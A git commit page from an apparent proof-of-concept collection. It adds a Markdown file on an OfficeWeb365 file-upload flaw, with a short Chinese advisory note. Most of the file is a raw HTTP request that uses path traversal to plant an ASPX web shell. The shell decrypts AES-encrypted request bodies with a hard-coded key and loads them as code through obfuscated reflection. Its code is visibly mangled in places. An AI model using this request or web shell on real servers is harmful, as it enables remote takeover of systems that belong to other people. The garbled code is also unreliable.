admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create OfficeWeb365 文件上传漏洞.md

Browse Source
This commit is contained in:
wy876 2023-08-20 10:00:37 +08:00 committed by GitHub
parent 2ce0189102
commit 234b65f437
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 80 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

80
OfficeWeb365 文件上传漏洞.md Normal file
View File

@ -0,0 +1,80 @@
## OfficeWeb365 文件上传漏洞
【消息详情】360漏洞云监测到网传《OfficeWeb365 远程代码执行漏洞》的消息经漏洞云复核确认为【真实】漏洞漏洞影响【未知】版本该漏洞标准化POC已经上传漏洞云情报平台平台编号360LDYLD-2023-00002453情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
360漏洞云监测到网传《OfficeWeb365远程代码执行漏洞》的消息经漏洞云复核确认为【真实】漏洞漏洞影响【未知】版本该漏洞标准化POC已经升级漏洞云情报平台平台编号 360LDYLD-2023-0000245
```
POST /PW/SaveDraw?path=../../Content/img&idx=1.aspx HTTP/1.1
Host:
Content-Length: 500817
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Accept-Encoding: gzip, deflate
data:image/png;base64,01s34567890123456789y12345678901234567m91<% @ Page Language="C #"%>
<% @ Import namespace="System. Reflection"%>
<Script Run="Server">
Private byte decryption (byte data)
{
String key="e45e329feb5d925b";
Data=Convert. FromBase64String (System. Text. Encoding. UTF8. GetString (data));
System. Security. Cryptography. RijndaelManaged aes=new System. Security. Cryptography. RijndaelManaged();
Aes. Mode=System. Security. Cryptography. CipherMode. ECB;
Aes. Key=Encoding. UTF8. GetBytes (key);
Aes. Padding=System. Security. Cryptography. PaddingMode. PKCS7;
Return aes. CreateDecryptor(). TransformFinalBlock (data, 0, data. Length);
}
Private Byte Encryption (Byte Data)
{
String key="e45e329feb5d925b";
System. Security. Cryptography. RijndaelManaged aes=new System. Security. Cryptography. RijndaelManaged();
Aes. Mode=System. Security. Cryptography. CipherMode. ECB;
Aes. Key=Encoding. UTF8. GetBytes (key);
Aes. Padding=System. Security. Cryptography. PaddingMode. PKCS7;
Return System. Text. Encoding. UTF8. GetBytes (Convert. ToBase64String (aes. CreateEncryptor(). TransformFinalBlock (data, 0, data. Length)));
}
</Script>
<%
//Byte [] c=Request. BinaryRead (Request. ContentLength); Assembly. Load (Decrypt (c)). CreateInstance ("U"). Equals (this);
Byte [] c=Request. BinaryRead (Request. ContentLength);
String asname=System. Text. Encoding. ASCII. GetString (new byte [] {0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2e, 0x52, 0x65, 0x66, 0x6c, 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x2e, 0x41, 0x73, 0x73, 0x65, 0x6d, 0x62, 0x6c, 0x79});
Type Assembly=Type. GetType (asname);
MethodInfo load=assembly. GetMethod ("Load", new Type [] {new byte [0]. GetType()});
Object obj=load. Invoke (null, new object [] {Decrypt (c)});
MethodInfo create=assembly. GetMethod ("CreateInstance", new Type [] {"". GetType()});
String name=System. Text. Encoding. ASCII. GetString (new byte [] {0x55});
Object pay=create. Invoke (obj, new object [] {name});
Pay. Equals (this);%>>---
```